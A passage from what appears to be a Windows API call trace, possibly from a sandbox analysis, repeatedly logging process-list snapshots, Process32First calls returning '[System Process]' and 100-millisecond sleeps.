Process]")) returned 1 [0208.184] Sleep (dwMilliseconds=0x64) [0208.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.201] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.281] Sleep (dwMilliseconds=0x64) [0208.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.394] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.474] Sleep (dwMilliseconds=0x64) [0208.476] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.491] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.592] Sleep (dwMilliseconds=0x64) [0208.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.616] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.689] Sleep (dwMilliseconds=0x64) [0208.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.704] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.027] Sleep (dwMilliseconds=0x64) [0210.037] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.050] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.182] Sleep (dwMilliseconds=0x64) [0210.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.199] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.272] Sleep (dwMilliseconds=0x64) [0210.274] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.287] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.359] Sleep (dwMilliseconds=0x64) [0210.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.450] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.517] Sleep (dwMilliseconds=0x64) [0210.532] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.547] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.604] Sleep (dwMilliseconds=0x64) [0210.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.657] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.711] Sleep (dwMilliseconds=0x64) [0210.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.725] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.786] Sleep (dwMilliseconds=0x64) [0210.788] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.799] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.857] Sleep (dwMilliseconds=0x64) [0210.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.871] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.942] Sleep (dwMilliseconds=0x64) [0210.943] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0210.960] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.033] Sleep (dwMilliseconds=0x64) [0211.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.049] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.113] Sleep (dwMilliseconds=0x64) [0211.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.127] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.180] Sleep (dwMilliseconds=0x64) [0211.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.194] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.253] Sleep (dwMilliseconds=0x64) [0211.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.265] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.317] Sleep (dwMilliseconds=0x64) [0211.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.328] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.408] Sleep (dwMilliseconds=0x64) [0211.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.436] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.502] Sleep (dwMilliseconds=0x64) [0211.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.516] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.585] Sleep (dwMilliseconds=0x64) [0211.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.600] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.659] Sleep (dwMilliseconds=0x64) [0211.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.672] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.725] Sleep (dwMilliseconds=0x64) [0211.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.740] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.800] Sleep (dwMilliseconds=0x64) [0211.803] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.853] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.909] Sleep (dwMilliseconds=0x64) [0211.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.923] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.982] Sleep (dwMilliseconds=0x64) [0211.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0211.994] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.053] Sleep (dwMilliseconds=0x64) [0212.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.066] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.133] Sleep (dwMilliseconds=0x64) [0212.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.145] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.216] Sleep (dwMilliseconds=0x64) [0212.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.231] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.297] Sleep (dwMilliseconds=0x64) [0212.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.315] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.374] Sleep (dwMilliseconds=0x64) [0212.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.424] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.480] Sleep (dwMilliseconds=0x64) [0212.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.497] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.552] Sleep (dwMilliseconds=0x64) [0212.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.567] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.646] Sleep (dwMilliseconds=0x64) [0212.648] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.660] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.733] Sleep (dwMilliseconds=0x64) [0212.736] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.751] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.824] Sleep (dwMilliseconds=0x64) [0212.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.842] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.912] Sleep (dwMilliseconds=0x64) [0212.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0212.932] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.010] Sleep (dwMilliseconds=0x64) [0213.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0213.091] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.324] Sleep (dwMilliseconds=0x64) [0213.442] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0213.487] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.574] Sleep (dwMilliseconds=0x64) [0213.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0213.589] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.652] Sleep (dwMilliseconds=0x64) [0213.654] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0213.671] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.745] Sleep (dwMilliseconds=0x64) [0213.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0213.764] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.838] Sleep (dwMilliseconds=0x64) [0213.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0213.854] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.928] Sleep (dwMilliseconds=0x64) [0213.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0213.947] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.027] Sleep (dwMilliseconds=0x64) [0214.029] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.044] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.142] Sleep (dwMilliseconds=0x64) [0214.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.165] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.318] Sleep (dwMilliseconds=0x64) [0214.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.338] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.441] Sleep (dwMilliseconds=0x64) [0214.446] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.461] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.539] Sleep (dwMilliseconds=0x64) [0214.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.556] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.626] Sleep (dwMilliseconds=0x64) [0214.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.639] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.730] Sleep (dwMilliseconds=0x64) [0214.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.746] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.817] Sleep (dwMilliseconds=0x64) [0214.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.833] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.900] Sleep (dwMilliseconds=0x64) [0214.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.914] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.983] Sleep (dwMilliseconds=0x64) [0214.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0214.999] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.063] Sleep (dwMilliseconds=0x64) [0215.065] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.077] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.138] Sleep (dwMilliseconds=0x64) [0215.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.161] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.226] Sleep (dwMilliseconds=0x64) [0215.228] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.244] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.305] Sleep (dwMilliseconds=0x64) [0215.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdb4 [0215.320] Process32First (in: hSnapshot=0xdb4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, 